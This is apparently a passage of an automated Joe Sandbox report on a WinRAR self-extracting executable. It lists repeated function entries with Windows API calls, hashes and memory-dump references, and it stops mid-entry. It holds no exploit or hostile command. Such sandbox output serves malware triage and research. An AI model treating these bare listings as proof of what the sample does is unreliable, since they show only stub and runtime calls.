                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID:
                                                              • API String ID: 697777088-0
                                                              • Opcode ID: 6e82f36d96885e1fead4f56c680d82265511d2f48397c854ba80f8b0cc998af2
                                                              • Instruction ID: 21aa6926d9070651660758cd6cd6c8e9f996401ebfb58214ebeed2b3449e7cb7
                                                              • Opcode Fuzzy Hash: 6e82f36d96885e1fead4f56c680d82265511d2f48397c854ba80f8b0cc998af2
                                                              • Instruction Fuzzy Hash: 2CB012C12EB1457D3504D1A69D03D7702FCC4C0B113B0742BB800F0181D8503E044031
                                                              Function 00E933EE Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E933D6
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID:
                                                              • API String ID: 697777088-0
                                                              • Opcode ID: 5ee758b06375113ae58155f264ca20b4601d7ec81bf2c2d30aaa1eb2a2a56901
                                                              • Instruction ID: 95c839b18ac01d577c159519e8fe7f9980cfff0d31a645e44fe2f2c0bedd3e14
                                                              • Opcode Fuzzy Hash: 5ee758b06375113ae58155f264ca20b4601d7ec81bf2c2d30aaa1eb2a2a56901
                                                              • Instruction Fuzzy Hash: 5AA002D51D91467D350451A19D46C77116CC4C4B51370795AB851A418158543D455031
                                                              Function 00E933E4 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E933D6
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID:
                                                              • API String ID: 697777088-0
                                                              • Opcode ID: 7facbe92e2712b720f2d7049695fa14099273e9826528be41405f65d8241210e
                                                              • Instruction ID: 95c839b18ac01d577c159519e8fe7f9980cfff0d31a645e44fe2f2c0bedd3e14
                                                              • Opcode Fuzzy Hash: 7facbe92e2712b720f2d7049695fa14099273e9826528be41405f65d8241210e
                                                              • Instruction Fuzzy Hash: 5AA002D51D91467D350451A19D46C77116CC4C4B51370795AB851A418158543D455031
                                                              Function 00E933C9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E933D6
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID:
                                                              • API String ID: 697777088-0
                                                              • Opcode ID: 7ef93b3755a6d3c176aae545606db2cea47feb643ae5b8cd6686a31545794f3c
                                                              • Instruction ID: 2620fccec63bc8980c274e14f68842e241b46288fc2f5263ca0f8fbb927640d1
                                                              • Opcode Fuzzy Hash: 7ef93b3755a6d3c176aae545606db2cea47feb643ae5b8cd6686a31545794f3c
                                                              • Instruction Fuzzy Hash: 84A002D51D51457D350451A19E46D77116DC4C0B11370755AB851B418158543D455031
                                                              Function 00E934CE Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E93484
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID:
                                                              • API String ID: 697777088-0
                                                              • Opcode ID: dcea8ec9bccdc07bc14898d2a459c069e88443d31bfdb9d53ba51f87643b7f51
                                                              • Instruction ID: d48269eb9468882003b028f284e6b2bdf351378b0e25e0724f40b919cd844fd9
                                                              • Opcode Fuzzy Hash: dcea8ec9bccdc07bc14898d2a459c069e88443d31bfdb9d53ba51f87643b7f51
                                                              • Instruction Fuzzy Hash: AEA012C51D81027C340611A09C02C77016CC0C4B10370650AB442A008054402D040030
                                                              Function 00E934C4 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E93484
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID:
                                                              • API String ID: 697777088-0
                                                              • Opcode ID: 3d717751aba9947c4e3897bc0d16d700a49846fa6761f506cbcf4b90b8f0b1ac
                                                              • Instruction ID: d48269eb9468882003b028f284e6b2bdf351378b0e25e0724f40b919cd844fd9
                                                              • Opcode Fuzzy Hash: 3d717751aba9947c4e3897bc0d16d700a49846fa6761f506cbcf4b90b8f0b1ac
                                                              • Instruction Fuzzy Hash: AEA012C51D81027C340611A09C02C77016CC0C4B10370650AB442A008054402D040030
                                                              Function 00E934BA Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E93484
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID:
                                                              • API String ID: 697777088-0
                                                              • Opcode ID: 2220b0602bb791766ce7483089b01035b8881f81b02abb967d4c91198a6d0250
                                                              • Instruction ID: d48269eb9468882003b028f284e6b2bdf351378b0e25e0724f40b919cd844fd9
                                                              • Opcode Fuzzy Hash: 2220b0602bb791766ce7483089b01035b8881f81b02abb967d4c91198a6d0250
                                                              • Instruction Fuzzy Hash: AEA012C51D81027C340611A09C02C77016CC0C4B10370650AB442A008054402D040030
                                                              Function 00E93420 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E933D6
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID:
                                                              • API String ID: 697777088-0
                                                              • Opcode ID: d3389fd39f0c1e5c4ba05019f55c52921d84d2de0a3797c986c2101e9579acfb
                                                              • Instruction ID: 95c839b18ac01d577c159519e8fe7f9980cfff0d31a645e44fe2f2c0bedd3e14
                                                              • Opcode Fuzzy Hash: d3389fd39f0c1e5c4ba05019f55c52921d84d2de0a3797c986c2101e9579acfb
                                                              • Instruction Fuzzy Hash: 5AA002D51D91467D350451A19D46C77116CC4C4B51370795AB851A418158543D455031
                                                              Function 00E9340C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E933D6
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID:
                                                              • API String ID: 697777088-0
                                                              • Opcode ID: 4338a0bd24959ebbcd9d4bd27145c5c33770568ef50ff8d1a0d249e50d7663df
                                                              • Instruction ID: 95c839b18ac01d577c159519e8fe7f9980cfff0d31a645e44fe2f2c0bedd3e14
                                                              • Opcode Fuzzy Hash: 4338a0bd24959ebbcd9d4bd27145c5c33770568ef50ff8d1a0d249e50d7663df
                                                              • Instruction Fuzzy Hash: 5AA002D51D91467D350451A19D46C77116CC4C4B51370795AB851A418158543D455031
                                                              Function 00E93416 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E933D6
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID:
                                                              • API String ID: 697777088-0
                                                              • Opcode ID: 005ca88cc7167c8e9e0b05167b0c443bfa355350380c21b16d0d5d1fce4f8860
                                                              • Instruction ID: 95c839b18ac01d577c159519e8fe7f9980cfff0d31a645e44fe2f2c0bedd3e14
                                                              • Opcode Fuzzy Hash: 005ca88cc7167c8e9e0b05167b0c443bfa355350380c21b16d0d5d1fce4f8860
                                                              • Instruction Fuzzy Hash: 5AA002D51D91467D350451A19D46C77116CC4C4B51370795AB851A418158543D455031
                                                              Function 00E934D3 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E934DB
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID:
                                                              • API String ID: 697777088-0
                                                              • Opcode ID: d4b93f0ca20b8078a308710468281c8659df1cf62f0ed3b19c61e9a739034761
                                                              • Instruction ID: 03f888f2cdae9d11c822a109c3dd9a7a45d92c227e383a2c0f8bee082c000a70
                                                              • Opcode Fuzzy Hash: d4b93f0ca20b8078a308710468281c8659df1cf62f0ed3b19c61e9a739034761
                                                              • Instruction Fuzzy Hash: EFA002EA2E92467D351862E1ED47C7F02BCC4C0F213B0A51FF800E41C2A8903D490031
                                                              Function 00E8FE24 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetCurrentDirectoryW.KERNEL32(?,00E8FFD0,C:\Users\user\AppData\Local\Temp\RarSFX0,00000000,00ECFA3A,00000006), ref: 00E8FE28
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CurrentDirectory
                                                              • String ID:
                                                              • API String ID: 1611563598-0
                                                              • Opcode ID: e6a02e12f558535e65611e21c0dcebf16c8a6b5f41671017c2e793cfd8d9c7c3
                                                              • Instruction ID: 33465871c3257baf6576a398f79902faa9740f608fbe89f4582b37198f4aecae
                                                              • Opcode Fuzzy Hash: e6a02e12f558535e65611e21c0dcebf16c8a6b5f41671017c2e793cfd8d9c7c3
                                                              • Instruction Fuzzy Hash: 42A012302005008F92000B218F4550F75596F51600F00C025610580030CB308824A500

                                                              Non-executed Functions

                                                              Function 00E91260 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00E811E6: GetDlgItem.USER32(00000000,00003021), ref: 00E8122A
                                                                • Part of subcall function 00E811E6: SetWindowTextW.USER32(00000000,00EA8574), ref: 00E81240
                                                              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00E912F1
                                                              • EndDialog.USER32(?,00000006), ref: 00E91304
                                                              • GetDlgItem.USER32(?,0000006C), ref: 00E91320
                                                              • SetFocus.USER32(00000000), ref: 00E91327
                                                              • SetDlgItemTextW.USER32(?,00000065,?), ref: 00E91361
                                                              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00E91398
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00E913AE
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E913CC
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E913DC
                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00E913F8
                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00E91414
                                                              • _swprintf.LIBCMT ref: 00E91444
                                                                • Part of subcall function 00E839A9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E839BC
                                                              • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00E91457
                                                              • FindClose.KERNEL32(00000000), ref: 00E9145E
                                                              • _swprintf.LIBCMT ref: 00E914B7
                                                              • SetDlgItemTextW.USER32(?,00000068,?), ref: 00E914CA
                                                              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00E914E7
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00E91507
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E91517
                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00E91531
                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00E91549
                                                              • _swprintf.LIBCMT ref: 00E91575
                                                              • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00E91588
                                                              • _swprintf.LIBCMT ref: 00E915DC
                                                              • SetDlgItemTextW.USER32(?,00000069,?), ref: 00E915EF
                                                                • Part of subcall function 00E9006D: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00E90093
                                                                • Part of subcall function 00E9006D: GetNumberFormatW.KERNEL32(00000400,00000000,?,00EB360C,?,?), ref: 00E900E2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                              • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                              • API String ID: 797121971-1840816070
                                                              • Opcode ID: 3fbf932107f527d7b801b42ef245469d6037442d5e361d8776b626ff06f141a9
                                                              • Instruction ID: 67c07be320351ec38b482a4b3ade9fa0ace0dbc1b0d604e3c8cb2cc6f11fbfcd
                                                              • Opcode Fuzzy Hash: 3fbf932107f527d7b801b42ef245469d6037442d5e361d8776b626ff06f141a9
                                                              • Instruction Fuzzy Hash: 3691DA72148349BFE721EBA0CD89FFB77ECEB4A704F011819F649E6181D771A6088762
                                                              Function 00E94561 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00E9456D
                                                              • IsDebuggerPresent.KERNEL32 ref: 00E94639
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00E94659
                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00E94663
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                              • String ID:
                                                              • API String ID: 254469556-0
                                                              • Opcode ID: c36ba4c610c2fb58c0c05aa9385fb6c167c5529fdedfbf5b93b11954b393c759
